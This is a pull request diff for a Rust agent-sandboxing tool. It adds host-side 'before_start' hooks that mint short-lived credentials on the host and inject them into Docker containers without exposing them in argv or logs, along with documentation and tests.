### PR TITLE
feat(sandbox): host-side before_start hooks that inject env into the container

### DIFF
--- a/docs/guides/configuration.md
+++ b/docs/guides/configuration.md
@@ -215,6 +215,21 @@ environment = ["GH_TOKEN=$AOE_GH_TOKEN"]                      # env vars forward
 
 See [Docker Sandbox](sandbox.md) for the full key reference (`cpu_limit`, `memory_limit`, `port_mappings`, `extra_volumes`, `volume_ignores`, `volume_ignores_strategy`, `auto_cleanup`, `default_terminal_mode`), the `environment` grammar, and credential handling. For env vars on host (non-sandboxed) sessions, use [Host Environment](#host-environment) instead; the two lists are disjoint.
 
+## Host Hooks
+
+The `[host_hooks]` block declares hooks that run on the **host** (not inside the sandbox container). Unlike `[hooks]`, which for sandboxed sessions runs inside the container, host hooks run in your host shell and can compute a value with host-only tooling and credentials, then hand only that value to the container.
+
+```toml
+[host_hooks]
+before_start = ['echo "GH_TOKEN=$(my-mint-tool $AOE_PROJECT_PATH)"']
+```
+
+`before_start` runs each time a sandbox container comes up (on create and on restart, so short-lived values are refreshed before the agent launches). Each `KEY=VALUE` line the command prints to stdout is injected into the container environment as an **inherited** variable: the value is passed to the `docker` invocation through the process environment, never in argv, so it does not appear in `ps`. Lines that are not `KEY=VALUE` are ignored, and the hook's stdout is never logged, so it is safe to print a secret. A non-zero exit aborts bringing the container up. The lifecycle env vars (`AOE_PROJECT_PATH`, `AOE_SESSION_ID`, `AOE_PROFILE`, ...) are available to the command.
+
+The canonical use case is per-session, repo-scoped, short-lived credentials: mint a one-hour, single-repo token on the host (where the broad credential lives) and inject only the narrow token, so the minting tool and host credential never enter the container.
+
+`host_hooks` is **global/profile only**: it is never honored from a repo's `.agent-of-empires/config.toml`, because a checked-out repository must not be able to run host commands. Declare it in your global or profile `config.toml`.
+
 ## tmux
 
 ```toml

--- a/src/acp/acp_client.rs
+++ b/src/acp/acp_client.rs
@@ -6514,6 +6514,7 @@ mod tests {
             container_name: "aoe-sandbox-abc12345".into(),
             extra_env: Some(vec!["MY_LITERAL=hello".into()]),
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let config = SpawnConfig {
             agent_key: "claude".into(),
@@ -6580,6 +6581,7 @@ mod tests {
             container_name: "aoe-sandbox-abc12345".into(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let config = SpawnConfig {
             agent_key: "claude".into(),
@@ -6650,6 +6652,7 @@ mod tests {
             container_name: "aoe-sandbox-cfgdir".into(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let config = SpawnConfig {
             agent_key: "claude".into(),

--- a/src/acp/sandbox.rs
+++ b/src/acp/sandbox.rs
@@ -83,8 +83,12 @@ pub async fn ensure_container_for_session(
         .await
         .context("docker ensure task failed to join")??;
 
-    // Phase 3: brief write lock to stamp the resolved container_id
-    // back onto the live Instance so subsequent reads observe it.
+    // Phase 3: brief write lock to stamp the resolved container_id (and the
+    // host-minted before_start env) back onto the live Instance so subsequent
+    // reads observe them. Carrying `before_start_env` back matters because the
+    // mint ran on the cloned instance above; without this, the next
+    // ensure_container_for_session would clone an empty cache and re-run the
+    // before_start hook on every view switch / spawn, re-minting credentials.
     if let Some(info) = &sandbox_info {
         let mut guard = instances.write().await;
         if let Some(inst) = guard.iter_mut().find(|i| i.id == session_id_owned) {
@@ -92,6 +96,7 @@ pub async fn ensure_container_for_session(
                 if sb.container_id.is_none() {
                     sb.container_id = info.container_id.clone();
                 }
+                sb.before_start_env = info.before_start_env.clone();
             }
         }
     }

--- a/src/cli/add.rs
+++ b/src/cli/add.rs
@@ -723,6 +723,7 @@ pub async fn run(profile: &str, args: AddArgs) -> Result<()> {
                 container_name,
                 extra_env: None,
                 custom_instruction: config.sandbox.custom_instruction.clone(),
+                before_start_env: Vec::new(),
             });
         }
     }

--- a/src/git/cleanup.rs
+++ b/src/git/cleanup.rs
@@ -688,6 +688,7 @@ mod tests {
             container_name: "aoe-sandbox-doesnotexist".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         });
 
         let worktree = std::path::PathBuf::from("/tmp/aoe-cleanup-test-nonexistent");
@@ -760,6 +761,7 @@ mod tests {
             container_name: "aoe-cruft-doesnotexist".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         });
 
         let git_wt = GitWorktree::new(main_repo.clone()).unwrap();

--- a/src/session/builder.rs
+++ b/src/session/builder.rs
@@ -703,6 +703,7 @@ pub fn build_instance(
                 Some(params.extra_env.clone())
             },
             custom_instruction: config.sandbox.custom_instruction.clone(),
+            before_start_env: Vec::new(),
         });
     }
 

--- a/src/session/config.rs
+++ b/src/session/config.rs
@@ -1,7 +1,7 @@
 //! User configuration management
 
 use super::get_app_dir;
-use super::repo_config::HooksConfig;
+use super::repo_config::{HooksConfig, HostHooksConfig};
 use anyhow::Result;
 use aoe_settings_derive::SettingsSection;
 use serde::{Deserialize, Serialize};
@@ -40,6 +40,11 @@ pub struct Config {
 
     #[serde(default)]
     pub hooks: HooksConfig,
+
+    /// Host-side lifecycle hooks. Profile/global only; never honored from a
+    /// repo's `.agent-of-empires/config.toml` (these run commands on the host).
+    #[serde(default)]
+    pub host_hooks: HostHooksConfig,
 
     #[serde(default)]
     pub sound: crate::sound::SoundConfig,

--- a/src/session/container_config.rs
+++ b/src/session/container_config.rs
@@ -2679,6 +2679,7 @@ extra_volumes = ["/host/data:/container/data:ro"]
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let project_path_str = project_dir.path().to_str().unwrap();
@@ -2785,6 +2786,7 @@ volume_ignores = ["**/bin", "**/obj", "target"]
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let project_path_str = project_dir.path().to_str().unwrap();
@@ -2925,6 +2927,7 @@ extra_volumes = ["/host/screenshots:/root/screenshots"]
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let config = build_container_config(
@@ -2968,6 +2971,7 @@ extra_volumes = ["/host/screenshots:/root/screenshots"]
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let instance_id = "codex-sandbox-hooks-test";
         let config = build_container_config(
@@ -3047,6 +3051,7 @@ extra_volumes = ["/host/screenshots:/root/screenshots"]
                 container_name: "test-container".to_string(),
                 extra_env: None,
                 custom_instruction: None,
+                before_start_env: Vec::new(),
             };
             let instance_id = format!("{}-sidecar-sandbox-test", agent.name);
             let config = build_container_config(
@@ -3106,6 +3111,7 @@ extra_volumes = ["/host/screenshots:/root/screenshots"]
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = build_container_config(
@@ -3154,6 +3160,7 @@ extra_volumes = ["/host/screenshots:/root/screenshots"]
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let instance_id = "codex-sandbox-hooks-disabled-test";
         let config = build_container_config(
@@ -3214,6 +3221,7 @@ agent_detect_as = { "wrapped-codex" = "codex" }
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let instance_id = "wrapped-codex-sandbox-hooks-test";
         let config = build_container_config(
@@ -3271,6 +3279,7 @@ agent_detect_as = { "wrapped-codex" = "codex" }
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let instance_id = "codex-sandbox-refresh-hooks-test";
         build_container_config(
@@ -3330,6 +3339,7 @@ trusted_hash = "keep"
             container_name: "test-container".to_string(),
             extra_env: Some(vec!["CODEX_HOME=/root/custom-codex".to_string()]),
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let instance_id = "codex-sandbox-extra-env-hooks-test";
         let config = build_container_config(
@@ -3383,6 +3393,7 @@ environment = ["CODEX_HOME=/root/profile-codex"]
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let instance_id = "codex-sandbox-config-env-hooks-test";
         let config = build_container_config(
@@ -3470,6 +3481,7 @@ extra_volumes = ["/host/personal-only:/container/personal-only:ro"]
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let has_volume = |config: &crate::containers::container_interface::ContainerConfig,
@@ -3620,6 +3632,7 @@ volume_ignores = ["target", "node_modules"]
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let project_path_str = worktree_path.to_str().unwrap();
@@ -3713,6 +3726,7 @@ volume_ignores = ["target"]
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let project_path_str = worktree_path.to_str().unwrap();
@@ -3867,6 +3881,7 @@ volume_ignores = ["target"]
             container_name: "test-container".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         }
     }
 

--- a/src/session/deletion.rs
+++ b/src/session/deletion.rs
@@ -695,6 +695,7 @@ mod tests {
                 container_name: "aoe-sandbox-doesnotexist".to_string(),
                 extra_env: None,
                 custom_instruction: None,
+                before_start_env: Vec::new(),
             });
 
             let request = DeletionRequest {
@@ -999,6 +1000,7 @@ mod tests {
                 container_name: "aoe-dirty-test-doesnotexist".to_string(),
                 extra_env: None,
                 custom_instruction: None,
+                before_start_env: Vec::new(),
             });
 
             (tmp, main_repo, worktree_path, instance)

--- a/src/session/environment.rs
+++ b/src/session/environment.rs
@@ -401,6 +401,19 @@ pub(crate) fn collect_environment(
         }
     }
 
+    // Host-minted `before_start` values are injected as inherited entries so the
+    // value is passed to docker via the process environment, never in argv.
+    // Placed before the configured entries so a freshly-minted secret wins over
+    // any same-keyed `sandbox.environment` / `extra_env` entry (first-wins).
+    for (key, value) in &sandbox_info.before_start_env {
+        if seen_keys.insert(key.clone()) {
+            result.push(EnvEntry::Inherit {
+                key: key.clone(),
+                value: value.clone(),
+            });
+        }
+    }
+
     for entry in entries {
         if let Some((key, value)) = entry.split_once('=') {
             if seen_keys.insert(key.to_string()) {
@@ -628,6 +641,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let project_path = temp_home.path().join("nonexistent_project");
 
@@ -881,6 +895,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -888,6 +903,35 @@ environment = ["GH_TOKEN=write_token"]
         assert_eq!(entry.value(), "test_value");
         assert!(matches!(entry, EnvEntry::Inherit { .. }));
         std::env::remove_var("AOE_TEST_ENV_PT");
+    }
+
+    #[test]
+    fn test_collect_environment_before_start_is_inherited() {
+        // before_start-minted values are emitted as Inherit entries (so the
+        // value rides the process env, never argv) and win over a same-keyed
+        // sandbox.environment literal.
+        let config = SandboxConfig {
+            environment: vec!["GH_TOKEN=stale_literal".to_string()],
+            ..Default::default()
+        };
+        let info = SandboxInfo {
+            enabled: true,
+            container_id: None,
+            image: "test".to_string(),
+            container_name: "test".to_string(),
+            extra_env: None,
+            custom_instruction: None,
+            before_start_env: vec![("GH_TOKEN".to_string(), "ghs_fresh".to_string())],
+        };
+
+        let result = collect_environment(&config, &info);
+        let entries: Vec<_> = result.iter().filter(|e| e.key() == "GH_TOKEN").collect();
+        assert_eq!(entries.len(), 1, "deduped to a single GH_TOKEN entry");
+        assert_eq!(entries[0].value(), "ghs_fresh");
+        assert!(
+            matches!(entries[0], EnvEntry::Inherit { .. }),
+            "before_start values must be Inherit (leak-safe), not Literal"
+        );
     }
 
     #[test]
@@ -903,6 +947,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -921,6 +966,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -957,6 +1003,7 @@ environment = ["GH_TOKEN=write_token"]
                 "GIT_CONFIG_VALUE_1=/workspace/other".to_string(),
             ]),
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -986,6 +1033,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: Some(vec!["AOE_TEST_EXTRA".to_string(), "FOO=bar".to_string()]),
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -1011,6 +1059,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: Some(vec!["DUP_KEY=from_session".to_string()]),
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -1032,6 +1081,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -1053,6 +1103,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -1075,6 +1126,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -1205,6 +1257,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: Some(vec!["AOE_TEST_TOKEN=$AOE_TEST_TOKEN".to_string()]),
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let result = build_docker_env_args("", &sandbox, std::path::Path::new("/nonexistent"));
         // docker_args should have the key but NOT the secret value
@@ -1240,6 +1293,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: Some(vec!["MY_MAPPED=$AOE_TEST_SOURCE".to_string()]),
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let result = build_docker_env_args("", &sandbox, std::path::Path::new("/nonexistent"));
         assert!(
@@ -1275,6 +1329,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: Some(vec!["AOE_TEST_BARE".to_string()]),
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let result = build_docker_env_args("", &sandbox, std::path::Path::new("/nonexistent"));
         assert!(
@@ -1309,6 +1364,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: Some(vec!["MY_LITERAL=some_value".to_string()]),
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let result = build_docker_env_args("", &sandbox, std::path::Path::new("/nonexistent"));
         assert!(
@@ -1342,6 +1398,7 @@ environment = ["GH_TOKEN=write_token"]
                 "MY_LITERAL=public_val".to_string(),
             ]),
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
         let result = build_docker_env_args("", &sandbox, std::path::Path::new("/nonexistent"));
         // Secret: key only in docker_args, value in exports
@@ -1442,6 +1499,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -1477,6 +1535,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -1503,6 +1562,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -1528,6 +1588,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);
@@ -1556,6 +1617,7 @@ environment = ["GH_TOKEN=write_token"]
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let result = collect_environment(&config, &info);

--- a/src/session/instance.rs
+++ b/src/session/instance.rs
@@ -304,6 +304,15 @@ pub struct SandboxInfo {
     /// Custom instruction text to inject into agent launch command
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub custom_instruction: Option<String>,
+    /// `KEY=VALUE` pairs minted on the host by `host_hooks.before_start` when
+    /// the container last came up. Injected into the container environment as
+    /// inherited (leak-safe) entries by [`super::environment::collect_environment`].
+    ///
+    /// Runtime-only and secret: never serialized (so short-lived tokens never
+    /// hit disk and a stale value never survives a restart) and re-minted on the
+    /// next container come-up. See [`Instance::ensure_before_start_env`].
+    #[serde(skip)]
+    pub before_start_env: Vec<(String, String)>,
 }
 
 /// Deserialize agent_session_id, treating empty/whitespace strings as None.
@@ -2406,20 +2415,26 @@ impl Instance {
     }
 
     pub fn get_container_for_instance(&mut self) -> Result<containers::DockerContainer> {
-        let sandbox = self
+        let image = self
             .sandbox_info
             .as_ref()
-            .ok_or_else(|| anyhow::anyhow!("Cannot ensure container for non-sandboxed session"))?;
-
-        let image = &sandbox.image;
-        let container = DockerContainer::new(&self.id, image);
+            .ok_or_else(|| anyhow::anyhow!("Cannot ensure container for non-sandboxed session"))?
+            .image
+            .clone();
+        let container = DockerContainer::new(&self.id, &image);
 
         if container.is_running()? {
+            // Already up: not a come-up, so don't re-mint. Fill lazily only if a
+            // fresh process attached to a running container with no values yet.
+            self.ensure_before_start_env(false)?;
             container_config::refresh_agent_configs();
             return Ok(container);
         }
 
         if container.exists()? {
+            // Restart of a stopped container is a come-up: refresh so a
+            // short-lived token is re-minted.
+            self.ensure_before_start_env(true)?;
             container_config::refresh_agent_configs();
             container.start()?;
             return Ok(container);
@@ -2427,8 +2442,11 @@ impl Instance {
 
         // Ensure image is available (always pulls to get latest)
         let runtime = containers::get_container_runtime();
-        runtime.ensure_image(image)?;
+        runtime.ensure_image(&image)?;
 
+        // Mint before building the container config so the docker-run env also
+        // carries the values (leak-safe via the inherit path in run_create).
+        self.ensure_before_start_env(true)?;
         let config = self.build_container_config()?;
         let container_id = container.create(&config)?;
 
@@ -2460,6 +2478,47 @@ impl Instance {
             self.workspace_info.as_ref(),
             &self.source_profile,
         )
+    }
+
+    /// Run `host_hooks.before_start` on the host and stash the resulting
+    /// `KEY=VALUE` pairs on `sandbox_info.before_start_env`, from where
+    /// [`super::environment::collect_environment`] injects them into the
+    /// container environment on every surface (docker run, the tmux `docker
+    /// exec` launch, and the structured-view worker).
+    ///
+    /// `force` re-mints unconditionally (a container come-up); when false the
+    /// hooks run only if no values are stashed yet, so attaching to an
+    /// already-running container backfills without re-minting on every relaunch.
+    /// A hook failure is propagated so the container does not come up without
+    /// the values the agent depends on. Hooks are resolved from profile/global
+    /// config only, never from the repo.
+    fn ensure_before_start_env(&mut self, force: bool) -> Result<()> {
+        if self.sandbox_info.is_none() {
+            return Ok(());
+        }
+        let commands = super::repo_config::resolve_before_start_hooks(&self.source_profile);
+        if commands.is_empty() {
+            if let Some(sb) = self.sandbox_info.as_mut() {
+                sb.before_start_env.clear();
+            }
+            return Ok(());
+        }
+        let already_minted = self
+            .sandbox_info
+            .as_ref()
+            .is_some_and(|s| !s.before_start_env.is_empty());
+        if !force && already_minted {
+            return Ok(());
+        }
+
+        let hook_env = super::repo_config::lifecycle_env_vars(self);
+        let project_path = PathBuf::from(&self.project_path);
+        let minted =
+            super::repo_config::run_before_start_hooks(&commands, &project_path, &hook_env)?;
+        if let Some(sb) = self.sandbox_info.as_mut() {
+            sb.before_start_env = minted;
+        }
+        Ok(())
     }
 
     pub fn maybe_start_poller(&mut self) {
@@ -4725,6 +4784,7 @@ mod tests {
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         });
         assert!(!inst.is_sandboxed());
     }
@@ -4739,6 +4799,7 @@ mod tests {
             container_name: "test".to_string(),
             extra_env: None,
             custom_instruction: None,
+            before_start_env: Vec::new(),
         });
         assert!(inst.is_sandboxed());
     }
@@ -4844,6 +4905,7 @@ mod tests {
             container_name: "test_container".to_string(),
             extra_env: Some(vec!["MY_VAR".to_string(), "OTHER_VAR".to_string()]),
             custom_instruction: None,
+            before_start_env: Vec::new(),
         };
 
         let json = serde_json::to_string(&info).unwrap();

--- a/src/session/instance.rs
+++ b/src/session/instance.rs
@@ -958,6 +958,17 @@ impl Instance {
         disk.retroactive_capture_excludes = std::mem::take(&mut self.retroactive_capture_excludes);
         disk.pane_dead_observed = self.pane_dead_observed;
         disk.source_profile = std::mem::take(&mut self.source_profile);
+        // `before_start_env` is `#[serde(skip)]`, so the disk snapshot always
+        // has it empty. Carry the live value forward; otherwise this reload
+        // (which runs before every launch) would wipe the host-minted cache and
+        // make `get_container_for_instance` re-run the before_start hook on each
+        // relaunch of an already-running container, defeating the one-time
+        // backfill and re-minting credentials needlessly.
+        if let (Some(disk_sandbox), Some(runtime_sandbox)) =
+            (disk.sandbox_info.as_mut(), self.sandbox_info.as_ref())
+        {
+            disk_sandbox.before_start_env = runtime_sandbox.before_start_env.clone();
+        }
 
         *self = disk;
     }
@@ -6006,6 +6017,57 @@ mod tests {
             assert_eq!(inst.agent_session_id.as_deref(), Some("old-sid"));
             inst.reconcile_from_disk();
             assert_eq!(inst.agent_session_id.as_deref(), Some("new-sid"));
+        }
+
+        #[test]
+        #[serial]
+        fn reconcile_from_disk_preserves_before_start_env() {
+            // `before_start_env` is `#[serde(skip)]`, so the disk snapshot has
+            // it empty. reconcile_from_disk (run before every launch) must carry
+            // the live host-minted cache forward, or an already-running
+            // container would re-mint on every relaunch.
+            let temp = tempdir().unwrap();
+            std::env::set_var("HOME", temp.path());
+            #[cfg(any(target_os = "linux", target_os = "macos"))]
+            std::env::set_var("XDG_CONFIG_HOME", temp.path().join(".config"));
+
+            let storage =
+                crate::session::storage::Storage::new_unwatched("reconcile-before-start").unwrap();
+            let mut inst = Instance::new("title", "/tmp/x");
+            inst.source_profile = "reconcile-before-start".to_string();
+            inst.sandbox_info = Some(crate::session::SandboxInfo {
+                enabled: true,
+                container_id: None,
+                image: "img".to_string(),
+                container_name: "ctr".to_string(),
+                extra_env: None,
+                custom_instruction: None,
+                before_start_env: Vec::new(),
+            });
+            let on_disk = inst.clone();
+            storage
+                .update(|i, g| {
+                    *i = vec![on_disk.clone()];
+                    *g = crate::session::GroupTree::new_with_groups(
+                        std::slice::from_ref(&on_disk),
+                        &[],
+                    )
+                    .get_all_groups();
+                    Ok(())
+                })
+                .unwrap();
+
+            // Stamp a freshly-minted value into the in-memory cache only.
+            inst.sandbox_info.as_mut().unwrap().before_start_env =
+                vec![("GH_TOKEN".to_string(), "ghs_minted".to_string())];
+
+            inst.reconcile_from_disk();
+
+            assert_eq!(
+                inst.sandbox_info.as_ref().unwrap().before_start_env,
+                vec![("GH_TOKEN".to_string(), "ghs_minted".to_string())],
+                "live before_start_env must survive the pre-launch disk reload"
+            );
         }
 
         #[test]

--- a/src/session/repo_config.rs
+++ b/src/session/repo_config.rs
@@ -28,6 +28,11 @@ use super::project_mcp::ProjectMcpServer;
 /// Personal/global sections (theme, status_hooks, acp, web, logging, host
 /// environment) are intentionally excluded, matching the historical typed
 /// `RepoConfig` that simply had no field for them.
+///
+/// `host_hooks` is deliberately absent: it runs commands on the host (see
+/// [`HostHooksConfig`]), so honoring it from a repo would let a checked-out
+/// repository execute arbitrary host commands. Host hooks are profile/global
+/// only.
 const REPO_OVERRIDABLE_SECTIONS: &[&str] = &[
     "hooks", "session", "sandbox", "worktree", "updates", "tmux", "sound",
 ];
@@ -109,6 +114,39 @@ pub struct HooksConfig {
 impl HooksConfig {
     pub fn is_empty(&self) -> bool {
         self.on_create.is_empty() && self.on_launch.is_empty() && self.on_destroy.is_empty()
+    }
+}
+
+/// Host-side hooks that run on the host (not inside the sandbox container).
+///
+/// Unlike [`HooksConfig`], which runs inside the container for sandboxed
+/// sessions, these run on the host before a sandbox container comes up. They
+/// are profile/global only and are never honored from a repo's
+/// `.agent-of-empires/config.toml` (see [`REPO_OVERRIDABLE_SECTIONS`]), because
+/// a checked-out repo must not be able to run host commands.
+#[derive(Debug, Clone, Default, Serialize, Deserialize)]
+pub struct HostHooksConfig {
+    /// Commands run on the host each time a sandbox container comes up (created
+    /// or restarted), before the agent is launched. Each line of `KEY=VALUE`
+    /// the command prints to stdout is injected into the container environment
+    /// as an inherited (leak-safe) variable: the value is passed to the agent's
+    /// `docker` invocation via the process environment, never in argv. Lines
+    /// that are not `KEY=VALUE` are ignored, and the hook's stdout is never
+    /// logged, so it is safe to print secrets (e.g. a short-lived token minted
+    /// on the host). A non-zero exit aborts bringing the container up.
+    ///
+    /// Accepts either a single string or an array of strings in TOML.
+    #[serde(
+        default,
+        skip_serializing_if = "Vec::is_empty",
+        deserialize_with = "super::serde_helpers::string_or_vec"
+    )]
+    pub before_start: Vec<String>,
+}
+
+impl HostHooksConfig {
+    pub fn is_empty(&self) -> bool {
+        self.before_start.is_empty()
     }
 }
 
@@ -934,14 +972,10 @@ fn run_hook_with_timeout(
                 target: "session.startup_recovery",
                 cmd = %cmd_label,
                 timeout_secs = timeout.as_secs(),
-                "on_launch hook timed out; killing process tree to release recovery lock"
+                "hook timed out; killing process tree to release recovery lock"
             );
             crate::process::kill_process_tree(pid);
-            anyhow::bail!(
-                "on_launch hook timed out after {}s: {}",
-                timeout.as_secs(),
-                cmd_label
-            )
+            anyhow::bail!("hook timed out after {}s: {}", timeout.as_secs(), cmd_label)
         }
         Err(mpsc::RecvTimeoutError::Disconnected) => anyhow::bail!(
             "hook drain thread disconnected before reporting result: {}",
@@ -1059,6 +1093,119 @@ pub fn execute_hooks_in_container(
         },
         extra_env,
     )
+}
+
+/// Resolve `host_hooks.before_start` from global + profile config only.
+///
+/// Deliberately resolved without repo overrides ([`resolve_config_or_warn`]
+/// rather than [`resolve_config_with_repo_or_warn`]) so a repo can never
+/// contribute host commands; this is belt-and-suspenders on top of
+/// `host_hooks` being excluded from [`REPO_OVERRIDABLE_SECTIONS`].
+pub fn resolve_before_start_hooks(profile: &str) -> Vec<String> {
+    let resolved = super::config::effective_profile(profile);
+    super::profile_config::resolve_config_or_warn(&resolved)
+        .host_hooks
+        .before_start
+}
+
+/// A character may start an environment variable name: ASCII letter or `_`.
+fn is_valid_env_key(key: &str) -> bool {
+    let mut chars = key.chars();
+    match chars.next() {
+        Some(c) if c.is_ascii_alphabetic() || c == '_' => {}
+        _ => return false,
+    }
+    key.chars().all(|c| c.is_ascii_alphanumeric() || c == '_')
+}
+
+/// Parse `KEY=VALUE` lines from a hook's stdout, ignoring blank lines, lines
+/// with no `=`, and lines whose key is not a valid env var name. Later entries
+/// override earlier ones for the same key. The value is preserved verbatim
+/// (only the line ending is stripped by [`str::lines`]).
+fn parse_env_kv_lines(stdout: &str) -> Vec<(String, String)> {
+    let mut out: Vec<(String, String)> = Vec::new();
+    for line in stdout.lines() {
+        let Some((key, value)) = line.split_once('=') else {
+            continue;
+        };
+        let key = key.trim();
+        if !is_valid_env_key(key) {
+            continue;
+        }
+        out.retain(|(k, _)| k != key);
+        out.push((key.to_string(), value.to_string()));
+    }
+    out
+}
+
+/// Run `host_hooks.before_start` commands on the host and collect the
+/// `KEY=VALUE` pairs they print to stdout.
+///
+/// The hook's stdout is intentionally never logged: it is the documented
+/// channel for secrets (e.g. a short-lived token), so logging it would defeat
+/// the point. A non-zero exit is a hard error (the container should not come up
+/// without the values the agent depends on); the error message includes stderr
+/// but never stdout. Honors the shared hook timeout so a hanging mint command
+/// cannot wedge a session launch.
+pub fn run_before_start_hooks(
+    commands: &[String],
+    project_path: &Path,
+    extra_env: &[(&'static str, String)],
+) -> Result<Vec<(String, String)>> {
+    let timeout = crate::session::recovery::current_hook_timeout();
+    let mut collected: Vec<(String, String)> = Vec::new();
+
+    for cmd in commands {
+        tracing::info!(
+            target: "session.store",
+            "Running before_start host hook (stdout not logged): {}",
+            cmd
+        );
+        let mut command = build_hook_command(
+            cmd,
+            &HookTarget::Local { project_path },
+            HookSpawnOpts {
+                merge_stderr: false,
+                detach_tty: true,
+            },
+            extra_env,
+        );
+        command
+            .stdout(std::process::Stdio::piped())
+            .stderr(std::process::Stdio::piped());
+
+        let output = match timeout {
+            None => command
+                .output()
+                .with_context(|| format!("Failed to execute before_start hook: {}", cmd))?,
+            Some(deadline) => run_hook_with_timeout(&mut command, deadline, cmd)?,
+        };
+
+        if !output.status.success() {
+            // Deliberately omit stdout from the error: it may carry the secret
+            // KEY=VALUE lines this hook exists to produce.
+            let stderr = String::from_utf8_lossy(&output.stderr);
+            let stderr_detail = if stderr.trim().is_empty() {
+                String::new()
+            } else {
+                format!("\nstderr:\n{}", stderr.trim_end())
+            };
+            anyhow::bail!(
+                "before_start hook failed with exit code {}: {}{}",
+                output.status.code().unwrap_or(-1),
+                cmd,
+                stderr_detail
+            );
+        }
+
+        let stdout = String::from_utf8_lossy(&output.stdout);
+        for (key, value) in parse_env_kv_lines(&stdout) {
+            collected.retain(|(k, _)| k != &key);
+            collected.push((key, value));
+        }
+    }
+
+    Ok(collected)
 }
 
 /// Execute hooks with best-effort semantics: all commands are attempted even if
@@ -1246,6 +1393,116 @@ mod tests {
     fn test_hooks_config_empty() {
